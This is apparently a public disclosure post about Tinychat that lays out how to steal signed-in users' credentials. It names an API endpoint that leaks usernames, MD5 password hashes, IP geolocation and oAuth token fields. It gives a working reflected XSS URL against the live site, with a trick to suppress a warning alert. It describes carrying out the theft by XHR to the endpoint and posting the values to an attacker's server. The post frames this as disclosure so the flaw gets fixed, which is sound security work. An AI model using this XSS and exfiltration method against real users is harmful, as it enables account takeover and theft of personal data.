reflip

Disclaimer:

        I am only posting this in the hopes that it gets fixed. I am not (and have never been) comfortable with reporting vulnerabilities/exploits personally.

        Too many of my friends have been threatened, sued, and/or lost their jobs by trying to help increase security awareness while both responsible and non-destructive.

       

        You are more than welcome (and encouraged) to report this vulnerability to Tinychat - hell, even try to get a bounty out of it.

 

Vulnerable users:

        Anyone who is signed in to Tinychat - even with social media auth.

 

Overview:

 

        I was looking through packets in wireshark while on Tinychat, and I came across an HTTP request

        that was sent right after the flash app loaded up that looked a little strange so I took a peeksie.

 

        It looks like it is the authentication creds for the user to start broadcasting to the room (and obviously sets up their accounts in the app).

 

        What I DIDN'T expect to find was my username and my MD5'd password hanging out for the world to see (providing they had the same session as me).

 

        Upon closer inspection I also came to find out that they store the username and password in a cookie and use that as the session identifier for the account....

        ...Which means that even if we can't find their unencrypted passwords we can still get on their accounts and pull any information we can get which includes:

 

                Username

                MD5 of password

                IP (which means we could also find out their rough location for SE purposes)

                Twitter

                        oAuth token (if attached to account)

                        Name

                        ID

                Facebook

                        oAuth token (if attached to account)

                        Name

                        ID

 

        ...Actually, why don't you just take a look (I made it look pretty).

       

                <response

                referer=''

                result='OK'

                time='**************TIMESTAMP**************'

                name='tinychat^netsec'

                roomtype='default'  

                rtmp='rtmp://69.65.43.160:443/tinyconf'    

                cip='**************User IP Here**************'

                rt='**************'>

 

                <userinfo

                id="**************"

                added="**************"

                description=""

                facebook_id=""

                facebook_name=""

                facebook_session=""

                greenroom=""

                is_male="1"

                location=""

                loggedin="1"

                myspace_id=""

                myspace_session=""

                password="**************MD5 OF PASSWORD**************"

                showmods=""

                twfb="0"

                twitter_id=""

                twitter_name=""

                twitter_token=""

                twitter_token_secret=""

                username="**************"

                website="" />

 

                <geoip

                area_code="**************"

                city="**************"

                continent_code="NA"

                country="USA"

                country_name="United States"

                latitude="**************"

                longitude="**************"

                metro_code="**************"

                postal_code="**************"

                region="**************"

                region_name="**************"

                time_zone="America/New_York" />

                </response>

 

 

Attack method(s):

       

        1. The social engineer

                Simply trick the user into copy/pasting the contents of the "vulnerable" page into a textbox, parsing out the desired values, and posting to your server to play with later.

               

        2. The XSS

                Find an XSS on the site and XHR to the "vulnerable" page, parse out the desired values, and postback to your server.

 

               

 

URL:

 

        GET:            http://tinychat.com/api/find.room/{ROOM_NAME}?site=tinychat

        Example:        http://tinychat.com/api/find.room/netsec?site=tinychat

 

       

!!B-B-B-B-BONUS STAGE!!:

       

        XSS (works in everything except Chrome - damn that XSS filter! :P ):

                http://tinychat.com/embedmaker.html?room="/>Netsec.<script> function generate_embed(){ /* SEE NOTE BELOW */ } alert(0);</script>

       

                Note: We define the generate_embed() function to disable the "Only alphanumeric characters allowed" alert which may let the user know that they are visiting a malicious URL.

       

 

So there we have it, /r/netsec/. Now we just need to use attack method #2 and we've got the users username, md5 of their pass, and any other information in the response listed above.

Since Tinychat now offers a paid service for HD video and other small UI enhancements this is kind of stupid that they wouldn't secure their shit.

...Then again I might just be being an asshole.

               

For Tinychat staff that may or may not read this:

        Remove ALL portions of your code that output their account information. This includes a few URL's in your /api/ directory and also the username and password cookies.

        It took me under a minute to find the XSS listed above - I'm sure there are more of them.

       

       

Thanks for reading, fellas.

 

-reflip